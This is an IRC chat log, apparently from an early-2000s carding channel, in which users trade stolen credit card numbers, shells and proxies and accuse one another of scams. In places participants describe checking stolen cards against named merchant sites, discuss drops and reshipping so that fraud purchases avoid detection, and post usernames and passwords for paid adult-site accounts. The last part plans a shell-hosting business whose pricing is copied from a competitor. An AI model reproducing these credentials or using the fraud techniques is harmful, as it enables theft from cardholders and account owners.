      :Mendoza! :hey . Ibill is  cardable?
      :DuXo! :hi to all
      :DuXo! :how are we today
      :NiCeBoY! :ello duxo
      :ABA! :Anyone want to trade cards? MSG me
      :DuXo! :npn msg me 
      :ABA! :Anyone want to trade cards? MSG me
      :NiCeBoY! :
      :DuXo! :any trade cc
      :ABA! :Anyone want to trade?
      :DuXo! :me :)
      :ABA! :heh
      :ABA! :again?
      :DuXo! ::))
      :DuXo! :yes but do u have with the phone number too?
      :lkd1! :i have
      :ABA! :no, just make one up innit :P
      :DuXo! :lkd1 :)
      :DuXo! :ripper:)
      :DuXo! :he just leave the channel :))
      :ABA! :ripper?
      :DuXo! ::)
      :ABA! :I just traded wif him :P
      :DuXo! :aND?
      :DuXo! ::)
      :DuXo! :he gaved u valid?
      :DuXo! :i haven`t trade..
      :ABA! :I verified
      :DuXo! :but he don`t wanted to trade with me .....
      :ABA! :before I gave him #
      :DuXo! :becasue he thinked...
      :DuXo! :im ripper 
      :2red! :duxo :P
      :DuXo! :with +v
      :ABA! :heh
      :ABA! :ive been ripped so many bloody times
      :ABA! :if they dont give me first
      :ABA! :I dont trade ever
      :DuXo! :ok....
      :ABA! :cos ive been ripped so many times
      :ABA! :about 10 times wif cards
      :ABA! :3 shells
      :ABA! :etc
      :2red! :tss
      :2red! :is that supposed to be something?
      :2red! :i got ripped off 40 virgins in one deal once
      :ABA! :40 virgins what?
      :2red! :40 virgin cards
      :ABA! :Drake``: Trade?
      :ABA! :ic
      :ABA! :and when some little foreign pissant lamer
      :ABA! :steals from you
      :Drake``! :trade what?
      :ABA! :then runs off
      :ABA! :Drake``: Cards
      :ABA! :it makes you wanna bloody cry
      :ABA! :and beat your comp
      :ABA! :innit
      :2red! :where are you from npn, romania?
      :ABA! :no uk
      :2red! :ok
      :2red! :sweden here
      :ABA! :england
      :2red! :interested in UK virgins?
      :ABA! :leet
      :ABA! :hmmm
      :ABA! :yup
      :2red! :i got plenty of international virgins
      :2red! :and US ofcourse
      :ABA! :quick tho
      :ABA! :cos i gtg real soon
      :2red! :err?
      :2red! :quick though what
      :ABA! :trade quick
      :ABA! :get on wif it
      :ABA! :cos i gtg
      :2red! :why would i trade virgins?
      :ABA! :no
      :ABA! :like i gib you summat else
      :2red! :hehe
      :2red! :i sell cards dear.
      :ABA! :oh dear
      :ABA! :so
      :ABA! :what do you want for it
      :2red! :money
      :ABA! :how much?
      :2red! :depends on how many you want
      :ABA! :10
      :2red! :100 dollars
      :ABA! :fuck me
      :2red! :?
      :ABA! :(please)
      :ABA! :i aint got 100$s
      :2red! :thats what it costs
      :2red! :thats how it is :)
      :hhkrgb! :romania anyone?
      :Bl4ck_! :yes
      :ABA! :0mg
      :ABA! :I dont fucking believe this
      :ABA! :that fool
      :ABA! :DuXo just ripped my card
      :ABA! :and ran
      :2red! :you surprised or something?
      :ABA! :erm
      :ABA! :yes
      :ABA! :hes an op
      :2red! :so?
      :ABA! :and ops dont do that kind of shit
      :ABA! :ive been trading here
      :ABA! :for about 
      :ABA! :6 months
      :ABA! :and no ops ever done that shit
      :2red! :thats interesting
      :2red! :cause i havent seen you areound much before
      :ABA! :Ive never seen you either
      :m4r1n4ru! :ABA can you send me a log man ?
      :2red! :my usual nick is mortie or lita
      :ABA! :m4r1n4ru yea, when I get back
      :ABA! :2red: ive seen the nick lita
      :ABA! :ages ago
      :m4r1n4ru! :ok send me log please
      :ABA! :I need dinner
      :t4b4cu! :huh
      :2red! :duxo
      :Piano2! :what?
      :t4b4cu! :so taht's lita
      :DuXo! :it`s me..
      :Bl4ck_! :t4b4cu?
      :2red! :im lita yeah
      :t4b4cu! :always changing nicks
      :t4b4cu! :hhe
      :DuXo! :i know..
      :Bl4ck_! ::>>
      :2red! :doesnt matter since i dont trade
      :2red! :i just watch you ppl
      :DuXo! :hm
      :2red! :and obviously an op just ripped?
      :DuXo! :npn
      :DuXo! :man
      :DuXo! :m4r1n4ru
      :DuXo! :i haven`t rip him up
      :2red! :what happened then?
      :DuXo! :man
      :DuXo! :he gaved me CCs
      :m4r1n4ru! :ya
      :m4r1n4ru! :what ?
      :DuXo! :2
      :DuXo! :and the both where invalid
      :DuXo! :we tradeed 340 minutes before
      :t4b4cu! :?
      :DuXo! :we tradeed 30 minutes before
      :DuXo! :he gaved me valid
      :t4b4cu! :who ripped?
      :DuXo! :and i gaved him valid CC
      :DuXo! :man
      :DuXo! :becuase i haved +v
      :t4b4cu! :who ripped?
      :t4b4cu! :i ban anyone who ripps
      :t4b4cu! :so ....i'd like to know
      :DuXo! :i checked the 2 ccs on www.come.to/tdnga
      :DuXo! :the first 2 sex banners..
      :DuXo! :i used the first one
      :DuXo! :and the CC comed out decliened
      :DuXo! :after that 
      :DuXo! :i checked the CC on www.bonzi.com
      :DuXo! :on Internet Boost
      :DuXo! :the first one come out and send me Invalid Card...
      :DuXo! :and another that the card is not valid anymore...
      :DuXo! :tabacu are u here??
      :2red! :oh well
      :2red! :you kids
      :2red! :i never understood the point of trading cards anyway
      :t4b4cu! :ahhahaah
      :t4b4cu! :looolz
      :t4b4cu! :us kids?
      :DuXo! :LoL
      :t4b4cu! :how old are u my dear?
      :2red! :im 20
      :2red! :why
      :DuXo! :so
      :t4b4cu! :lolz
      :DuXo! :what will happen?
      :t4b4cu! :i'm 20 too
      :DuXo! :u know that im a Legit one 
      :DuXo! :i can prove that man..
      :DuXo! :i have never ripped a man
      :t4b4cu! :most ppl areound here are about that age
      :2red! :i dont see anyone in here as legit
      :t4b4cu! :ahhah
      :t4b4cu! :what about me?
      :2red! :why would i see you as legit?
      :t4b4cu! :i have more ccs than anyone here
      :t4b4cu! :heh
      :2red! :and how many is that?
      :t4b4cu! :and i never ripped in my life
      :t4b4cu! :about 40.000
      :2red! :is it just me or could anyone say that?
      :t4b4cu! :anyway....i more hacker than carder
      :2red! :same here
      :t4b4cu! :that's why i could take this chan over
      :t4b4cu! :eheh
      :t4b4cu! :with my friends
      :hhkrgb! :join/romania
      :2red! :taking over a channel doesnt really require any skills.
      :hhkrgb! :wops
      :t4b4cu! :we flooded from oc48
      :t4b4cu! :heh
      :t4b4cu! :lolz
      :t4b4cu! :it does
      :2red! :packeting is for kids
      :t4b4cu! ::)
      :DuXo! :tabacu
      :DuXo! :is everthing ok now?
      :t4b4cu! :yeh it is
      :DuXo! :ok..
      :m4r1n4ru! :hhm
      :DuXo! :what?
      :m4r1n4ru! :so he ripped or not ?
      :DuXo! :no man..
      :DuXo! :i telled u i checked the cc
      :DuXo! :where is he 
      :DuXo! :i will talk with him
      :DuXo! :and check the CCs again
      :DuXo! :and give to the channel
      :m4r1n4ru! :ok
      :DuXo! :i don`t have the logs....
      :DuXo! :to prove right now..
      :hhkrgb
      :co^digigi! :hekss
      :co^digigi! :heks...
      :co^digigi! :i have a shell...and wanna trade with calling card
      :co^digigi! :serious person msg me 
      :DuXo! :cool
      :Co0lWoRx! :yo
      :DuXo! :let`s got to work
      :DuXo! :gety
      :DuXo! :get
      :DuXo! :and try that .
      :Co0lWoRx! :damn it
      :DuXo! :what the fuck is this :)
      :seriuscar! :what did you have in mind about tradi
      :seriuscar! :have bnc, proxies and shell....msg me if want to trade
      :seriuscar! :have bnc, proxies and shell....msg me if want to trade
      :Drake``! :co^digigi left after ripping me
      :Drake``! :hehehe
      :Co0lWoRx! :yo drake
      :seriuscar! :have bnc, proxies and shell....msg me if want to trade
      :seriuscar! :have bnc, proxies and shell....msg me if want to trade
      :seriuscar! :have bnc, proxies and shell....msg me if want to trade
      :MRuiCosta! :ACTION will trade virgin mc and visa for a shell acct that lets me dns host a .net site
      :taur! :salut
      :taur! :astia tac si fac
      :ows
      :ows
      :ows
      :MonTs! :howdy folks?
      :xKurko! :Can anyone do me a favour... Msg me.... Virgin CC in it for ya
      :xKurko! :Can anyone do me a favour... Msg me.... Virgin CC in it for ya
      :iDoetS! :gollllllllllllll
      :iDoetS! :1 more
      :MonTs! :1 more for whom?
      :iDoetS! :ceko
      :m4r1n4ru! :-join #rocarding
      :m4r1n4ru! :-save
      :xKurko! :can anyone gimme one fast proxy???
      :m4r1n4ru! :-op
      :|AmDeAtH! :-op 
      :|AmDeAtH! :lol hehe
      :Reaggyman! :Do sombody now what the program ares do?
      :Reaggyman! :whats ares?
      :trinix! :sup all?
      :Reaggyman! :trinix: do you now what ares is
      :trinix! :any one got any tips for ordering stuff to yer own house with out getting caugfht?
      :trinix! :caught?
      :trinix! :no
      :trinix! :sultrix says u guys are the ones to ask
      :Reaggyman! :Do you now a program that cracks sex(enter)password?
      :trinix! :nope
      :Reaggyman! :are you new here?
      :trinix! :yeah
      :Reaggyman! :me to
      :Reaggyman! :nowbody answers
      :trinix! :I am from uk
      :Reaggyman! :Norway
      :trinix! :I need help on how to order to my house with out getting caught
      :trinix! :using cc
      :Reaggyman! :What?
      :Reaggyman! :Order What?
      :trinix! :I wanna order stuff yeah but want to order straight to my house in the uk
      :Reaggyman! :isent that easy?
      :trinix! :hmm not sure
      :trinix! :I wanna an abandoned house but can't find any
      :Reaggyman! :I dont now
      :Reaggyman! :i came here to
      :Reaggyman! :i need a cracking program
      :trinix! :why dun you just go to www.xxxpassowrds.com
      :glipy! :what cracking program
      :Reaggyman! :i dont think they got THAT kind of passwords
      :Reaggyman! :The name is Ares
      :Reaggyman! :Hi sultrix
      :trinix! :heya man
      :Reaggyman! :i was band for xxxpasswords
      :Sultrix! :Hello
      :Sultrix! ::-(
      :Reaggyman! :Can you help me sultriz
      :Reaggyman! :x
      :Sultrix! :Can you guys help me i had a few working CC's but the dun work no more cxan anyone throw me few WORKING cc's my way please ?
      :Sultrix! :Reaggyman: Sure whatsup ?
      :Reaggyman! :Do you now a program that cracks sex(enter)password?
      :MonTs! :Reaggyman ....try going to http://www.catfiles.net/adult.htm
      :Sultrix! :hmm
      :Sultrix! :no idea
      :Reaggyman! :Monts: whats that?
      :MonTs! :go there and have a look
      :Reaggyman! :and this is 
      :Reaggyman! :password?
      :Reaggyman! :Hi tauer
      :Tauer! :hi
      :Reaggyman! :can you help me?
      :Reaggyman! :Do you now a program that cracks sex(enter)password?
      :astavista! :lol
      :trinix! :shit can anyone slide me some tips?
      :tauer! :mai 
      :tauer! :asa ceva mai greu
      :trinix! :shit can anyone slide me some tips?
      :Reaggyman! :tauer what+
      :tauer! :dar poti s-a te duci la un site care da passworduri pt siteuri de genu asta
      :trinix! :wtf
      :tauer! :sau potzi s-a te inregistrezi cu un card
      :Reaggyman! :English plis
      :tauer! :lol
      :tauer! :u can go to a site thwt give u password
      :tauer! :sheet
      :tauer! :sorry
      :trinix! :wtf
      :tauer! :anibody spek romanian?
      :trinix! :shit can anyone give me some tips?
      :tauer! :what kind of tips?
      :tauer! :trinix?
      :Sultrix! :in credit card fraud he means
      :tauer! :lol
      :tauer! :what i am thinking....:)
      :Sultrix! :heh
      :tauer! :the chanel carding
      :trinix! :I wanna send some stuff to my house in the uk, any tips on how to not get caught?
      :tauer! :is hard to someone to teel u about theat
      :tauer! :in uk?
      :tauer! :is verry hard
      :trinix! :what?
      :tauer! :but u can sendit to me in other country
      :trinix! :is hard to someone to teel u about theat <------------ what?
      :tauer! :and i can sendit to u
      :trinix! :nah
      :tauer! :about:I wanna send some stuff to my house in the uk, any tips on how to not get caught?
      :xKurko! :I offered that and Im in the UK with a different drop than my house
      :trinix! :I have cc of people in USA and wanna buy stuff in the UK and send it to me in my house
      :tauer! :i dont write to well in enghlish
      :trinix! :any tips?
      :tauer! :u can sendit to me in romania and i sendit to u after the pocket arieve to me
      :tauer! ::)
      :trinix! :nah take to long
      :tauer! :lol
      :tauer! :is my turn?
      :trinix! :besides you might keep it
      :tauer! :to ping time out?
      :tauer! :food weaponds?
      :tauer! :flood
      :trinix! :wb bro
      :Sultrix! :ta 
      :Sultrix! :wassup bra
      :trinix! :nadda
      :trinix! :reading up on some shit
      :Sultrix! :cool
      :Sultrix! :Has anyone here got any WORKING CC numbers ?
      :tauer! :i sell vodoo 3 3000 100$
      :tauer! :whith id
      :tauer! ::)
      :damang! :need some fresh cc
      :Sultrix! :me too
      :YesIAm! :haha
      :trinix! :me too
      :Sultrix! :Anyone got any cc numbers that work
      :trinix! :answer him god damn it
      :YesIAm! :my cc number works 
      :fus10nx! :nope...
      :YesIAm! ::)
      :CC-Master! :who trade here?
      :fus10nx! :not U
      :fus10nx! :Not I
      :trinix! :fus10nx yeah....
      :CC-Master! :?
      :CC-Master! :so 
      :CC-Master! :anyone for trade round here?
      :damang! :shells for fresh cc
      :CC-Master! :what shels or ccz?
      :damang! :i have shelz
      :Sultrix! :Does anyone have any CC's ??
      :CC-Master! :ye
      :CC-Master! :i have 
      :CC-Master! :so?
      :Sultrix! :that i can have
      :YesIAm! :hahaahaha
      :Sultrix! :ffs
      :damang! :need some fresh cc
      :Sultrix! :Can nayone dish some ccs my wya pease
      :YesIAm! :If somebody wanted to donate a # he would paste it into the chan
      :damang! :i have shelz wana trade w/ cc
      :BONI! :hi anyone for trade?
      :YesIAm! :<CC-Master> anyone for trade round here?
      :BONI! :?
      :BONI! :so>?
      :rgers! :hi boni
      :rgers! :how are u?
      :rgers! ::))
      :Nic[AwaY]! :ACTION have a lot of ccs ( Mastercards and Visas ) trading for more or eggdroppable shells
      :Papa-tudo! :anyone trade bncs with vhosts?
      :Papa-tudo! :ACTION trading bncs with vhosts
      :Papa-tudo! :ACTION trading bncs with vhosts
      :Papa-tudo! :ACTION trading bncs with vhosts
      :ureche! :re
      :_Mephisto! :re
      :_Mephisto! :cine pizda masii a pus topicul ala idiot?
      :SIZIF! :enybody have cc?
      :Bl4ck_! :t4b4cu
      :ucok! :hai
      :Bl4ck_! :salut
      :ucok! :
      :ucok! :xeexxexeexxeeeexe
      :t4b4cu! :salut
      :dlotos33! :is there anyone from MACEDONIA?
      :SIZIF! :yep
      :blazo99! :what's the problem duds
      :FanTom! :some one wots to trade
      :GoDsHaNd! :can someone help me?
      :blazo99! :what's the problem
      :GoDsHaNd! :blazo99
      :GoDsHaNd! :ej
      :GoDsHaNd
      :Pinu\away! :hi
      :t4b4cu! :c
      :Clasher! :Sorry to bother, but, does anyone have a spare card?
      :Co0lWoRx! :
      :Bl4ck_! :m4r1n4ru
      :Bl4ck_! :m4r1n4ru
      :Bl4ck_! :m4r1n4ru
      :m4r1n4ru! :marca ma
      :Co0lWoRx! :7me any1 here wanna earn +v, msg me now
      :Co0lWoRx! :ACTION any1 here wanna earn +v, msg me now
      :Co0lWoRx! :ACTION any1 here wanna earn +v, msg me now
      :Bl4ck_! :de ce am ban pe #rocarding?
      :Bl4ck_! :Co0lWoRx :PP
      :m4r1n4ru! :?
      :Co0lWoRx! :?
      :Co0lWoRx! :?
      :Co0lWoRx! :???
      :Bl4ck_! :Co0lWoRx I used to have +v in here
      :Bl4ck_! ::>>
      :Co0lWoRx! :well, y u loose it?
      :Bl4ck_! :dunno
      :Bl4ck_! :never minds
      :Bl4ck_! ::>>
      :SIZIF! :enybody have cc?
      :Co0lWoRx! :look at this shit ppl
      :Co0lWoRx! :<SIZIF> do u have cc's?
      :Co0lWoRx! :<Co0lWoRx> hmmm, yes, a lot
      :Co0lWoRx! :<SIZIF> would u like to send me just one?
      :Co0lWoRx! :<Co0lWoRx> hahahaha, go away pls lamer
      :SIZIF! :enybody have cc?
      :Co0lWoRx! :ure banned man, bye
      :SIZIF! :IZIF> <SIZIF> succker <Co0lWoRx
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :Co0lWoRx! :ok ok
      :yourlife! :k
      :Co0lWoRx! :w8
      :GoDsHaNd! :no i'm not
      :_Mephisto! :he is right
      :GoDsHaNd! :he want to gave CC which doesn't work
      :GoDsHaNd! :i sad to him to gave me to check fhirst
      :GoDsHaNd! :i'm not RIPPER
      :yourlife! :proove it ,,,
      :GoDsHaNd! :how?
      :_Mephisto! :give to all a good card
      :GoDsHaNd! :ahahahahahahahaa
      :GoDsHaNd! :you r crazy
      :DuXo! :hi too all
      :DuXo! :how are we today
      :yourlife! :who win football ? danmark or holland ? 
      :Co0lWoRx! :holland
      :DuXo! :Holland :)
      :DuXo! :3:0
      :_Mephisto! :3-0
      :_Mephisto! :hey what do you think of romania?
      :DuXo! :has been storm around?
      :Co0lWoRx! :nope
      :yourlife! :tomorrow will be a great match 
      :DuXo! :yes
      :yourlife! :Ger-Eng
      :DuXo! :Germany  - England
      :DuXo! :..
      :yourlife! :very big battle 
      :DuXo! :anyone here from Europe and wanna Chat ???
      :Co0lWoRx! :me...
      :DuXo! ::))
      :DuXo! :i already know u cool:)
      :DuXo! :anyone see Playboy?
      :Co0lWoRx! :hmmmmmmm, ok
      :Co0lWoRx! :i want playboy
      :DuXo! ::)
      :DuXo! :LoL
      :Co0lWoRx! :yo duxo, go card a membership at www.playboy.com
      :DuXo! :why?
      :DuXo! ::))
      :Co0lWoRx! :so we can use it, go pls
      :Co0lWoRx! :for me....
      :Clasher! :Sorry to bother, but, does anyone have a spare card?
      :Co0lWoRx! :=o)
      :DuXo! ::)
      :DuXo! ::)
      :dlotos33! :Enyone is from ROMANIA?
      :DuXo! :
      :DuXo! :
      :DuXo! :go 
      :DuXo! :see some girls
      :DuXo! :www.playboy.com
      :DuXo! :username : duxoboy16
      :Bl4ck__! :lolz
      :DuXo! :pass : dukovski16]
      :DuXo! :pass : dukovski16
      :DuXo! :pass : dukovski16
      :DuXo! :don`t see the fucking pc all the day
      :Co0lWoRx! :no man
      :Co0lWoRx! :w8
      :Co0lWoRx! :w8
      :Bl4ck__! :looolz
      :Bl4ck__! :www.schoolgirls.com
      :DuXo! :http://cyber.playboy.com/members
      :DuXo! :http://cyber.playboy.com/members
      :DuXo! :hm.
      :DuXo! :that`s good too..
      :DuXo! :i have account on that
      :DuXo! :but i don`t know the fucking pass
      :Bl4ck__! :username : dementul@qubemail.com
      :DuXo! :;)))
      :Bl4ck__! :pass cromo34
      :Bl4ck__! ::>>
      :DuXo! :come on 
      :DuXo! :go shake ur dicks:)))))
      :Co0lWoRx! :lol
      :_Mephisto! ::P
      :DuXo! :put ur dick in the Cd-rom :)) because u can`t put it in pussy :))))))
      :yourlife! :?
      :DuXo! :what ???
      :yourlife! ::)
      :m4r1n4ru! :-join #rocarding
      :m4r1n4ru! :-save
      :TanTouze! :I was sexually assaulted by Bill Clinton
      :DuXo! :anyone here wants to be my drop?
      :Sp07! :sup
      :Sp07! :im done with high school
      :Sp07! :ahahhhhhhhhhhhhhhhhhhhhhhhhhahahaa
      :Sp07! :
      :Sp07! :@#$
      :Sp07! :
      :Sp07! :
      :DuXo! :bye to all
      :_Mephisto! :bya
      :_Mephisto! :bye
      :Tzaranul! :aaa
      :Tzaranul! :re
      :Tzaranul! ::)
      :SPANkY_! :anyone here trade msg me
      :SPANkY_! :anyone here trade msg me
      :Nightw|sH! :re Bl4ck
      :SPANkY_! :anyone here trade msg me
      :trinix! :sup all?
      :trinix! :any one want to send some ccs over my way?
      :trinix! :any one want to send some ccs over my way?
      :SPANkY_! :anyone here trade msg me
      :D1ck! :ins
      :D1ck! :J4n3 
      :SPANkY_! :anyone here trade msg me
      :SPANkY_! :anyone here trade msg me
      :SPANkY_! :anyone here trade msg me
      :dmonchild! :ACTION i am selling hardware if your intrested please /msg me for prices
      :Cyb3rL0rd! :re ppl
      :Sultrix! :Does anyone have any WORKING credit cards the will let me have one to use ?
      :hackmon! :bye
      :Sultrix! :Does anyone have any WORKING credit cards the will let me have one to use ?
      :Fr0d! :any1 op/voice wanna trade
      :m4r1n4ru! :-op
      :Co0lWoRx! :hello
      :Fr0d`! :hey
      :Fr0d`! :sup manm
      :Bl4ck_! :Chel00 heya
      :m4r1n4ru! :ajajajajaj
      :Co0lWoRx! :lol
      :Co0lWoRx! :hey negro, do u ever wonder why Chel00 never talks?
      :Bl4ck_! :coz is an emech
      :Bl4ck_! :Chel00 say hi Co0lWoRx
      :Bl4ck_! ::>
      :Chel00! :hi Co0lWoRx
      :Bl4ck_! ::PP
      :Co0lWoRx! :lol
      :Co0lWoRx! :ok
      :_KAoS_! :anyone in that wants to trade?
      :Fr0d! :msg me
      :Co0lWoRx! :bbl
      :TanTouze! :sell me something.... anything. QUICK
      :Bl4ck_! :ACTION is away -[ bbl ]- at 04:48a -[ P:On / L:On ]-
      :Bl4ck_! :ACTION is back -[ bbl ]- gone 1 min 49 s
      :m4r1n4ru! :-op
      :m4r1n4ru! :-op
      :connex! :i need a cc to buy a shell...anybody can help me?
      :[Mighty]! :trade CC ? 
      :Fr0d! :msg me
      :connex! :yes or visa(master)
      :Tzaranul! :re
      :Tzaranul! ::)
      :connex! :i need a cc to buy a shell...anybody can help me?
      :connex! :i need a cc to buy a shell...anybody can help me?
      :_Mephisto! :where do you buy the shell???
      :Bl4ck_! :www.turbulent.net
      :Bl4ck_! :www.turboshell.com
      :Bl4ck_! :www.shellyeah.org
      :Bl4ck_! :www.bestshell.com
      :_Mephisto! :thx
      :Bl4ck_! ::>
      :[sm0ke]! :is turbulent.net cardable?
      :m4r1n4ru! :nope
      :m4r1n4ru! :ajajajaaja
      :[sm0ke]! :hehe. i knew it. .
      :[sm0ke]! :u have to mail da freakin receipt. .. to have it activated. .
      :connex! :i need a cc to buy a shell...anybody can help me?
      :connex! :pls help me
      :_Mephisto! :bye
      :connex! :i need a cc to buy a shell...anybody can help me?
      :connex! :pls help me
      :[sm0ke]! :buy a shell? where?
      :connex! :[sm0ke] help me
      :connex! :[sm0ke] help me i want to buy a shell
      :TheRason! :hello anybody
      :TheRason! :i need a cc to buy a web domain 
      :[sm0ke]! :
      :card-it! :trading lists, /msg me....
      :card-it! :trading lists and merchants, /msg me....
      :card-it! :no traders in here?
      :Bl4ck_! :ACTION is away -[ Starcraft si astea si alea ]- at 06:26a -[ P:On / L:On ]-
      @ away message: "Starcraft and this and that"

      :card-it! :trading lists and merchants, /msg me....
      :card-it! :trading lists and merchants, /msg me....
      :card-it! :trading lists and merchants, /msg me....
      :card-it! :trading lists and merchants, /msg me....
      :card-it! :trading lists and merchants, /msg me....
      :|Makaveli! :how can we get the +v???
      :|Makaveli! :or an op
      :gatorade^! :ACTION is trading ccz msg me
      :J4n3! :D1ck  ?
      :D1ck! :yep
      :D1ck! :y0
      :D1ck! :i am from my dad's laptiop
      :D1ck! :sun
      :D1ck! :i need a webpage
      :D1ck! :for the box
      :J4n3! :webpage ?
      :D1ck! :deal finialised
      :D1ck! :and u know how can i accept credit card online?
      :J4n3! :yeah u can but fruad bauth hoga, but
      @ yeah you can, but there will be a lot of fraud, but

      :D1ck! :?
      :J4n3! :if u set the rule that fax or email the scanned copy of credit card phir sahi hai
      @ if you set the rule that they fax or email a scanned copy of the credit card, then it's fine

      :D1ck! :we have to pay for fraud or its their responsibility/
      :D1ck! :oh
      :D1ck! :kool
      :J4n3! :yeah :)
      :D1ck! ::)
      :D1ck! :can u start the page
      :D1ck! :?
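      :J4n3! :server ka kyia huwa ?
      @ what happened with the server?

      :J4n3! :webpage ban jayega forun, j0e kay site ka matter hai meray pass, just need the prices
      @ the webpage will be made right away, I have the content from j0e's site, just need the prices
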
      :J4n3! :what's the compnay name ? i mean site name ?
      :J4n3! :?
      :D1ck! :got d/c
      :J4n3! :wb
      :J4n3! :webpage ban jayega forun, j0e kay site ka matter hai meray pass, just need the prices
      @ the webpage will be made right away, I have the content from j0e's site, just need the prices

      :D1ck! :thx
      :J4n3! :what's the compnay name ? i mean site name ?
      :D1ck! :company's name is  'Big Stuff'
      :D1ck! :or u have any beter name?
      :D1ck! :i want a site some thing like www.unixrules.net
      :D1ck! :i`ll tell u the prices
      :J4n3! :hmm
      :J4n3! :unixrules is booked i think
      :D1ck! :no no
      :D1ck! :i am ssaying
      :D1ck! :look at their page
      :D1ck! :it rox
      :J4n3! :oh u mean designing ?
      :D1ck! :yeps
      :D1ck! :hehe
      :D1ck! :'Big Stuff' 
      :D1ck! :The Ultimate Web Solution.
      :J4n3! :hmm
      :D1ck! :till when will be the website complete?
      :J4n3! :wait lemme take a look
      :D1ck! :oki
      :J4n3! :hmm yeah saw it
      :D1ck! :kewl
      :D1ck! :what prices should we do?
      :J4n3! :no idea i think it should start from 9 to 10 $ for shell
      :J4n3! :3 to 4 for bnc
      :D1ck! :oki
      :J4n3! :webhosting i'll ask j0e
      :D1ck! :okies
      :J4n3! :oye what bout server ??
      :D1ck! :  4 background processes (eggdrop, screen, irc) 
      :J4n3! :got this box its fast 24.66.83.137.mb.wave.home.com
      :D1ck! :  2 login names 
      :D1ck! :  20 MB total disk space 
      :D1ck! :  FTP, and SSH access 
      :D1ck! :  2 POP3 Email addresses (username@celebreum.net) 
      :D1ck! :  Access to hundreds of VHOSTS 
      :D1ck! :  3 months [$30] - 6 months [$60] - 12 months [$120]
      :D1ck! :  Credit Card Customers, Sign up here
      :D1ck! :  Sign up Now
      :J4n3! :but no linux root kit :(
      :D1ck! :server?
      :D1ck! :heheh
      :J4n3! :i mean have u finalized? 
      :D1ck! :my computer is not working
      :D1ck! :thats why i am in this
      :D1ck! :yep
      :J4n3! :oh
      :D1ck! :finisalised
      :J4n3! :going to pay for it ?
      :D1ck! :yep
      :J4n3! :anuallay ?? how much ?
      :D1ck! :welp
      :D1ck! :200/month
      :D1ck! :and rent is 25 
      :D1ck! :225
      :J4n3! :oh kewl
      :J4n3! :ip's ?
      :J4n3! :how much ip's ?
      :D1ck! :256
      :D1ck! ::")
      :J4n3! :great :)
      :D1ck! :hehe
      :D1ck! :wait i`ll send u .txt for shells
      :D1ck! :one sec
      :J4n3! :k
      :J4n3! ::)
      :D1ck! ::)
      :J4n3! :Caldera OpenLinux(TM)
      :J4n3! :Version 2.2
      :J4n3! :Copyright 1996-1999 Caldera Systems, Inc.
      :D1ck! :oye accept this
      :J4n3! :send send
      :J4n3! :bin/login: error in loading shared libraries: libcrypt.so.1: cannot open shared object file: No such file or directory
      :D1ck! :make it attractive and stuff
      :J4n3! : DCC Unable to create connection: Connection refused
      :D1ck! :err
      :D1ck! :copy paste this
      :D1ck! :SPECIAL PACKAGE
      :D1ck! :  
      :D1ck! :  4 background processes (eggdrop, screen, irc, energymechs) 
      :D1ck! :  25 MB total disk space 
      :D1ck! :  FTP, and SSH access 
      :D1ck! :  2 POP3 Email addresses (username@celebreum.net) 
      :D1ck! :  Access to hundreds of VHOSTS 
      :D1ck! :  
      :D1ck! :  1 month [$20] 3 months [$40] - 6 months [$60] - 12 months [$120]
      :D1ck! :SILVER SHELL ACCOUNT 
      :D1ck! :  2 background processes (eggdrop, screen, irc, energymechs) 
      :D1ck! :  10MB total disk space 
      :D1ck! :  FTP, and SSH access 
      :D1ck! :  POP3 Email addresses (username@celebreum.net) 
      :D1ck! :  Access to hundreds of VHOSTS 
      :D1ck! :  1 month [$10] 3 months [$30] - 6 months [$55] - 12 months [$100] 
      :D1ck! : 
      :D1ck! :GOLD SHELL  
      :D1ck! :  4 background processes (eggdrop, screen, irc, energymechs) 
      :D1ck! :  2 login names 
      :D1ck! :  FREE Personal vhost   (username@can.choose.from.many.domains)
      :D1ck! :  100 MB total disk space 
      :D1ck! :  FTP and SSH access 
      :D1ck! :  2 POP3 Email addresses (username@celebreum.net) 
      :D1ck! :  Access to hundreds of VHOSTS 
      :D1ck! :  3 months [$60] - 6 months [$110] - 12 months [$200] 
      :D1ck! :make the rupeese too pls
      :D1ck! ::P
      :J4n3! :hah u forgot to write the BitchX ?
      :D1ck! :oh yes
      :D1ck! :irc==BitchX
      :J4n3! :eggdrop, screen, irc, energymechs, BitchX
      :D1ck! :yep yep
      :D1ck! :add it
      :D1ck! ::P
      :J4n3! :ok
      :J4n3! :kkz wait lemme copy it
      :D1ck! :oye thats stolen from unixrules
      :D1ck! :so change it a bit
      :D1ck! :jhehe
      :D1ck! :hehe
      :J4n3! :ok done :)
      :J4n3! :yeah don worry prices r same ?
      :J4n3! :or u modified it ?
      :D1ck! :modified
      :D1ck! :and mb space too
      :J4n3! :kkz
      :J4n3! :Celebrium ?
      :D1ck! :yep
      :D1ck! :ok now webpage
      :D1ck! :BASIC WEBHOSTING  
      :D1ck! :  100MB disk space 
      :D1ck! :  1 Mailbox (POP3/SMTP) 
      :D1ck! :  $0.50 per MB on any average storage beyond the standard   allowed disk space 
      :D1ck! :  500 MB of data transfer per month 
      :D1ck! :  3 months [$30] - 6 months [$55] - 12 months [$100] 
      :D1ck! :PRIME WEBHOSTING  
      :D1ck! :  200 MB disk space 
      :D1ck! :  5 Mailboxes (POP3/SMTP) 
      :D1ck! :  FREE Domain Name Registration (internic fee applies) 
      :D1ck! :  Unlimited email address forwarding 
      :D1ck! :  Custom CGI script directory 
      :D1ck! :  $0.50 per MB on any average storage beyond the standard   allowed disk space 
      :D1ck! :  1500 MB of data transfer per month 
      :D1ck! :  3 months [$60] - 6 months [$110] - 12 months [$200]
      :D1ck! :PRO WEBHOSTING  
      :D1ck! :  350 MB disk space 
      :D1ck! :  25 Mailboxes (POP3/SMTP) 
      :D1ck! :  Unlimited email address forwarding 
      :D1ck! :  Custom CGI script directory 
      :D1ck! :  PHP3 access 
      :D1ck! :  Frontpage Extension access 
      :D1ck! :  $0.50 per MB on any average storage beyond the standard   allowed disk space 
      :D1ck! :  5000 MB of data transfer per month 
      :D1ck! :  3 months [$150] - 6 months [$275] - 12 months [$500]
